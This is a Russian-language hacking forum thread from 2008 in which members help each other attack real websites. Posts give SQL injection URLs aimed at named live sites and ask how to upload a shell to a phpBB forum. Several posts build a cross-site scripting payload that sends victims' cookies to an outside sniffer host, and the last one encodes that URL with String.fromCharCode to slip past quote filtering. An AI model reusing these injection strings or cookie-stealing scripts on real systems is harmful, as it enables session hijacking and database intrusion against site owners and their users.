Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Error performing query: Mixing of GROUP columns (MIN(),MAX(),COUNT()...) with no GROUP columns is illegal if there is no GROUP BY clause

    юзал юнион,написало вот такое чудо )).Хотел узнать,почему выдаёт такую ошибку,и каким образом мона ещё выбрать все столбцы.Груп бай мона юзать только для определения кол.-ва столбцов,как я понял,но не выбирать(какойнить там злоссный груп селект ) ))))))))).

    P.S. Help o_O )
     
  2. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    прив, народ, блин никак не получается залить шелл в пхпбб. есть админка. не раскритих путей. аватары на нормальность проверяються (не только расширение)
    Такое пробовал (http://forum.antichat.ru/showpost.php?p=198446&postcount=3)
     
    #1402 Dimi4, 27 Mar 2008
    Last edited: 27 Mar 2008
  3. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    >> Это серьёзно?Можн залить shell?
    http://studsovet.ulsu.ru/forum/
    Cори если не по теме

    Там уже кто то постарался:
    >> Error performing query: Mixing of GROUP columns (MIN(),MAX(),COUNT()...) with no GROUP columns is illegal if there is no GROUP BY clause

    юзал юнион,написало вот такое чудо )).Хотел узнать,почему выдаёт такую ошибку,и каким образом мона ещё выбрать все столбцы.Груп бай мона юзать только для определения кол.-ва столбцов,как я понял,но не выбирать(какойнить там злоссный груп селект ) ))))))))).

    P.S. Help o_O )

    Сразу давай ссылку.
     
    1 person likes this.
  4. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Ж(.Сам хотел воть...ну лан,на )))

    http://www.laptopshowcase.co.uk/suppliers.php?id=-4+union+select+1,2,3,4,5,6,7,8,9/*
     
  5. Buffalon

    Buffalon Elder - Старейшина

    Joined:
    22 Mar 2008
    Messages:
    241
    Likes Received:
    34
    Reputations:
    8
    Error performing query: Mixing of GROUP columns (MIN(),MAX(),COUNT()...) with no GROUP columns is illegal if there is no GROUP BY clause
    Ээээ... .
    http://www.laptopshowcase.co.uk/suppliers.php?id=-4+UNION+SELECT+1,2+FROM+suppliers.id--
    Помойму это похоже на ->
     
  6. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    Пытаюсь разобраться с xss но почему-то на снифер ничего не приходит. в исходнике страницы, какую открывает пишет:
    что здесь не так?
     
    #1406 samarin, 27 Mar 2008
    Last edited: 27 Mar 2008
  7. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Велемир
    Поиск по форуму и пост от Constantine:
    _http://forum.antichat.ru/showpost.php?p=500497&postcount=3638
    :D
     
  8. hulk

    hulk New Member

    Joined:
    27 Jan 2008
    Messages:
    22
    Likes Received:
    1
    Reputations:
    0
    Не подобрать столбцы

    http://ktv-spb.ru/admin/aut.php?user=1'
     
  9. Анжелика

    Анжелика Elder - Старейшина

    Joined:
    25 Mar 2008
    Messages:
    25
    Likes Received:
    36
    Reputations:
    -4
    видимо там mysql 3 версии или кривой запрос
    2 столбца, но юнион не работает
     
  10. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    просто ошибка в БД, ничего выловить не сможешь
     
  11. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    ковычки попробуй убрать
    <script>img=new Image();img.src=http://s.netsec.ru/snif.gif? document.cookie;</script>
     
  12. desTiny

    desTiny Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    1,006
    Likes Received:
    444
    Reputations:
    94
    img.src="http://s.netsec.ru/snif.gif?"+document.cookie;
    по-моему...
     
  13. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    там по-ходу фильтр на ковычки стоит, так что стоит попробовать без ковычек!
     
  14. desTiny

    desTiny Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    1,006
    Likes Received:
    444
    Reputations:
    94
    Ну тогда...
    stringFromCharCode =)
     
  15. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Кавычки, судя по всему, экранируются. Можно обойти с помощью String.fromCharCode()
     
  16. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    Та же история :(
    в исходнике:
     
  17. desTiny

    desTiny Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    1,006
    Likes Received:
    444
    Reputations:
    94
    Ты что делаешь??? Тв не кавычки заменяй на ...fromCharCode, а строчку свою! и плюсик поставь перед document.cookie!
     
  18. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Хы-хы))
    Так попробуй
    Code:
    String.fromCharCode(0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x73,0x2e,0x6e,0x65,0x74,0x73,0x65,0x63,0x2e,0x72,0x75,0x2f,0x73,0x6e,0x69,0x66,0x2e,0x67,0x69,0x66,0x3f)+document.cookie;
    
     
  19. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    Чем это ты закодировал?или где?
    -----------------------------------------
    Все равно ничего не получается. Уж извините, если достал уже, но ведь я только учусь!
    Вот сам запрос:
    Пробую через CHAR():И если через CHAR только кавычки-одна беда
    ----------------------------------------------------
    Приведите чтоли пример, как бы сделали ВЫ!
    ----------------------------------------------------
     
    #1419 samarin, 28 Mar 2008
    Last edited: 28 Mar 2008
  20. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Так бы и сделали
    Code:
    `><script>img = new Image(); img.src = String.fromCharCode(0x68,0x74,0x74,0x70,0x3a,0x2f,  0x2f,0x73,0x2e,0x6e,0x65,0x74,0x73,0x65,0x63,0x2e,
    0x72,0x75,0x2f,0x73,0x6e,0x69,0x66,0x2e,0x67,0x69,
    0x66,0x3f)+document.cookie;</script>
    
     
Thread Status:
Not open for further replies.